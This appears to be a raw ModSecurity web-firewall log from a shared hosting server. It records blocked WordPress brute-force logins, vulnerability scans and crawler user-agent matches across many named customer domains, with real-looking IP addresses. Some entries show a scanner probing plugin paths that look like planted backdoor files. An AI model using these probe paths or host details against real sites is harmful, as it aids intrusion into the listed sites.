[Tue May 26 15:20:09.677372 2026] [security2:error] [pid 707292:tid 707416] [remote 103.95.119.103:43994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVs0dKAqlRPSIEFAutWFgAAyHs"]
[Tue May 26 15:20:11.951447 2026] [security2:error] [pid 707292:tid 707456] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs09KAqlRPSIEFAutWSwAAAKc"]
[Tue May 26 15:20:13.822605 2026] [security2:error] [pid 707292:tid 707453] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs1dKAqlRPSIEFAutWjAAAAKQ"]
[Tue May 26 15:20:14.067024 2026] [security2:error] [pid 707292:tid 707443] [client 46.8.57.191:33517] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVs1dKAqlRPSIEFAutWkgAAAJo"], referer: https://anujtradingco.com
[Tue May 26 15:20:16.282618 2026] [security2:error] [pid 707292:tid 707510] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs19KAqlRPSIEFAutW_gAAAN0"]
[Tue May 26 15:20:17.399545 2026] [security2:error] [pid 707292:tid 707425] [client 43.172.198.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVs2dKAqlRPSIEFAutXNQAAAIg"]
[Tue May 26 15:20:17.809929 2026] [security2:error] [pid 707292:tid 707511] [client 195.133.84.14:54310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.84.133.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVs2dKAqlRPSIEFAutXQgAAAN4"], referer: https://afstpaul.org/
[Tue May 26 15:20:18.447500 2026] [security2:error] [pid 707292:tid 707532] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs2tKAqlRPSIEFAutXUQAAAPM"]
[Tue May 26 15:20:18.557068 2026] [security2:error] [pid 707292:tid 707513] [client 195.133.84.14:46164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.84.133.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVs2tKAqlRPSIEFAutXZwAAAOA"], referer: https://afstpaul.org/wp-admin/admin-ajax.php
[Tue May 26 15:20:19.262212 2026] [security2:error] [pid 707292:tid 707331] [remote 163.223.13.54:36462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVs29KAqlRPSIEFAutXdwAAxCY"]
[Tue May 26 15:20:20.575384 2026] [security2:error] [pid 707292:tid 707428] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs3NKAqlRPSIEFAutXlQAAAIs"]
[Tue May 26 15:20:21.094469 2026] [security2:error] [pid 707292:tid 707449] [client 195.133.84.14:46174] ModSecurity: Warning. Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "1439"] [id "9009999"] [msg "8 char spam"] [hostname "afstpaul.org"] [uri "/wp-content/plugins/background-image-cropper/accesson.php"] [unique_id "ahVs3dKAqlRPSIEFAutXswAAAKA"], referer: https://afstpaul.org/wp-admin/admin-ajax.php
[Tue May 26 15:20:21.210765 2026] [security2:error] [pid 707292:tid 707449] [client 195.133.84.14:46174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.84.133.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-content/plugins/background-image-cropper/accesson.php"] [unique_id "ahVs3dKAqlRPSIEFAutXswAAAKA"], referer: https://afstpaul.org/wp-admin/admin-ajax.php
[Tue May 26 15:20:23.013840 2026] [security2:error] [pid 707292:tid 707428] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs3tKAqlRPSIEFAutX5AAAAIs"]
[Tue May 26 15:20:23.968281 2026] [security2:error] [pid 707292:tid 707352] [remote 222.165.190.235:47660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVs39KAqlRPSIEFAutYCQAA8js"]
[Tue May 26 15:20:24.168779 2026] [security2:error] [pid 707292:tid 707493] [client 195.133.84.14:46176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.84.133.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-content/plugins/background-image-cropper/eee642b94bc7.php"] [unique_id "ahVs4NKAqlRPSIEFAutYFwAAAMw"], referer: https://afstpaul.org/wp-content/plugins/background-image-cropper/accesson.php
[Tue May 26 15:20:24.989394 2026] [security2:error] [pid 707292:tid 707437] [client 114.119.139.251:61681] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVs4NKAqlRPSIEFAutYMAAAAJQ"], referer: https://theafterglow-centre.com/events/list/page/2/?tribe-bar-date=2024-01-17&eventDisplay=past
[Tue May 26 15:20:25.115633 2026] [security2:error] [pid 707292:tid 707451] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs4NKAqlRPSIEFAutYJgAAAKI"]
[Tue May 26 15:20:26.083019 2026] [security2:error] [pid 707292:tid 707458] [client 114.119.156.59:33311] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "oscpl.com"] [uri "/robots.txt"] [unique_id "ahVs4tKAqlRPSIEFAutYUAAAAKk"]
[Tue May 26 15:20:27.216416 2026] [security2:error] [pid 707292:tid 707516] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs4tKAqlRPSIEFAutYbgAAAOM"]
[Tue May 26 15:20:28.229365 2026] [security2:error] [pid 707292:tid 707508] [client 123.21.173.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs49KAqlRPSIEFAutYkAAAANs"]
[Tue May 26 15:20:28.560422 2026] [security2:error] [pid 707292:tid 707477] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs5NKAqlRPSIEFAutYogAAALw"]
[Tue May 26 15:20:29.043801 2026] [security2:error] [pid 707292:tid 707432] [client 8.215.24.140:58437] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahVs5NKAqlRPSIEFAutYqQAAAI8"]
[Tue May 26 15:20:30.606818 2026] [security2:error] [pid 707292:tid 707437] [client 8.215.24.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/administrator/index.php"] [unique_id "ahVs5tKAqlRPSIEFAutY7wAAAJQ"]
[Tue May 26 15:20:30.607473 2026] [security2:error] [pid 707292:tid 707486] [client 8.215.24.140:58513] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/administrator/index.php"] [unique_id "ahVs5tKAqlRPSIEFAutY7QAAAMU"]
[Tue May 26 15:20:31.369868 2026] [security2:error] [pid 707292:tid 707427] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs5tKAqlRPSIEFAutY_AAAAIo"]
[Tue May 26 15:20:32.534618 2026] [security2:error] [pid 707292:tid 707380] [remote 123.30.233.13:50938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVs6NKAqlRPSIEFAutZIQAAvFc"]
[Tue May 26 15:20:33.543709 2026] [security2:error] [pid 707292:tid 707434] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs6dKAqlRPSIEFAutZNgAAAJE"]
[Tue May 26 15:20:35.875589 2026] [security2:error] [pid 707292:tid 707538] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs69KAqlRPSIEFAutZdwAAAPk"]
[Tue May 26 15:20:38.046141 2026] [security2:error] [pid 707292:tid 707452] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs7dKAqlRPSIEFAutZtQAAAKM"]
[Tue May 26 15:20:39.767191 2026] [security2:error] [pid 707292:tid 707518] [client 143.198.83.148:39386] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "162.215.241.212"] [uri "/index.php"] [unique_id "ahVs7tKAqlRPSIEFAutZ0gAAAOU"]
[Tue May 26 15:20:40.172368 2026] [security2:error] [pid 707292:tid 707434] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs79KAqlRPSIEFAutZ8wAAAJE"]
[Tue May 26 15:20:42.357585 2026] [security2:error] [pid 707292:tid 707433] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs8dKAqlRPSIEFAutaOQAAAJA"]
[Tue May 26 15:20:42.359244 2026] [security2:error] [pid 707292:tid 707471] [client 85.208.96.203:62824] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/8/"] [unique_id "ahVs8tKAqlRPSIEFAutaRgAAALY"]
[Tue May 26 15:20:42.359396 2026] [security2:error] [pid 707292:tid 707471] [client 85.208.96.203:62824] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/8/"] [unique_id "ahVs8tKAqlRPSIEFAutaRgAAALY"]
[Tue May 26 15:20:44.244551 2026] [security2:error] [pid 707292:tid 707549] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs89KAqlRPSIEFAutadAAAAQQ"]
[Tue May 26 15:20:44.289931 2026] [security2:error] [pid 707292:tid 707302] [remote 123.30.233.13:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVs9NKAqlRPSIEFAutahQAAowk"]
[Tue May 26 15:20:45.900120 2026] [security2:error] [pid 707292:tid 707533] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs9dKAqlRPSIEFAutasgAAAPQ"]
[Tue May 26 15:20:48.028350 2026] [security2:error] [pid 707292:tid 707444] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs99KAqlRPSIEFAuta9gAAAJs"]
[Tue May 26 15:20:49.969728 2026] [security2:error] [pid 707292:tid 707443] [client 114.119.148.237:51277] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVs-dKAqlRPSIEFAutbRgAAAJo"], referer: http://haddingtonwines.com/cart?remove_item=e8432fb72c61c9066957124e5a420a05
[Tue May 26 15:20:50.137448 2026] [security2:error] [pid 707292:tid 707323] [remote 178.156.182.155:33066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVs-dKAqlRPSIEFAutbRQAAqh4"]
[Tue May 26 15:20:51.053663 2026] [security2:error] [pid 707292:tid 707499] [client 31.57.184.107:56457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tripmanagers.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVs-tKAqlRPSIEFAutbXgAAANI"], referer: https://www.bing.com/
[Tue May 26 15:20:52.424505 2026] [security2:error] [pid 707292:tid 707528] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs_NKAqlRPSIEFAutbewAAAO8"]
[Tue May 26 15:20:57.190659 2026] [security2:error] [pid 707292:tid 707441] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtANKAqlRPSIEFAutcDwAAAJg"]
[Tue May 26 15:20:59.301439 2026] [security2:error] [pid 707292:tid 707431] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtAtKAqlRPSIEFAutcUAAAAI4"]
[Tue May 26 15:20:59.539488 2026] [security2:error] [pid 707292:tid 707441] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtA9KAqlRPSIEFAutcXQAAAJg"]
[Tue May 26 15:21:00.928202 2026] [security2:error] [pid 707292:tid 707546] [client 14.229.111.251:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtBNKAqlRPSIEFAutcgAAAAQE"]
[Tue May 26 15:21:01.583328 2026] [security2:error] [pid 707292:tid 707431] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtBdKAqlRPSIEFAutclQAAAI4"]
[Tue May 26 15:21:01.902831 2026] [security2:error] [pid 707292:tid 707425] [client 20.104.227.76:12057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpimentel.contabilidadecarioca.com.br"] [uri "/wk/index.php"] [unique_id "ahVtBdKAqlRPSIEFAutcqQAAAIg"]
[Tue May 26 15:21:03.655436 2026] [security2:error] [pid 707292:tid 707546] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtB9KAqlRPSIEFAutcygAAAQE"]
[Tue May 26 15:21:05.537408 2026] [security2:error] [pid 707292:tid 707476] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtCdKAqlRPSIEFAutc9wAAALs"]
[Tue May 26 15:21:05.541939 2026] [security2:error] [pid 707292:tid 707533] [client 157.22.100.45:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVtCdKAqlRPSIEFAutc7wAAAPQ"]
[Tue May 26 15:21:05.542419 2026] [security2:error] [pid 707292:tid 707473] [client 157.22.100.45:9091] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "doyecpa.com"] [uri "/"] [unique_id "ahVtCdKAqlRPSIEFAutc7AAAALg"]
[Tue May 26 15:21:07.874314 2026] [security2:error] [pid 707292:tid 707478] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtC9KAqlRPSIEFAutdNgAAAL0"]
[Tue May 26 15:21:09.580720 2026] [security2:error] [pid 707292:tid 707547] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtDdKAqlRPSIEFAutdZgAAAQI"]
[Tue May 26 15:21:10.569354 2026] [security2:error] [pid 707292:tid 707517] [client 20.104.227.76:4449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpimentel.contabilidadecarioca.com.br"] [uri "/inputs.php"] [unique_id "ahVtDtKAqlRPSIEFAutdlgAAAOQ"]
[Tue May 26 15:21:11.440017 2026] [security2:error] [pid 707292:tid 707514] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtD9KAqlRPSIEFAutdpQAAAOE"]
[Tue May 26 15:21:14.212938 2026] [security2:error] [pid 707292:tid 707460] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtEdKAqlRPSIEFAuteBQAAAKs"]
[Tue May 26 15:21:15.149931 2026] [security2:error] [pid 707292:tid 707489] [client 157.22.100.45:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVtEtKAqlRPSIEFAuteEQAAAMg"], referer: http://doyecpa.com/
[Tue May 26 15:21:15.150446 2026] [security2:error] [pid 707292:tid 707434] [client 157.22.100.45:63701] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "doyecpa.com"] [uri "/"] [unique_id "ahVtEtKAqlRPSIEFAuteDwAAAJE"], referer: http://doyecpa.com/
[Tue May 26 15:21:15.720080 2026] [security2:error] [pid 707292:tid 707457] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtE9KAqlRPSIEFAuteLAAAAKg"]
[Tue May 26 15:21:18.694860 2026] [security2:error] [pid 707292:tid 707444] [client 62.60.130.233:64005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVtFtKAqlRPSIEFAuteiAAAAJs"], referer: https://www.facebook.com/
[Tue May 26 15:21:18.719650 2026] [security2:error] [pid 707292:tid 707524] [client 127.0.0.1:21430] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "127.0.0.1"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVtFtKAqlRPSIEFAutelAAAAOs"]
[Tue May 26 15:21:18.719700 2026] [security2:error] [pid 707292:tid 707437] [client 127.0.0.1:21414] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.digentasmartsn.com"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVtFtKAqlRPSIEFAutekwAAAJQ"]
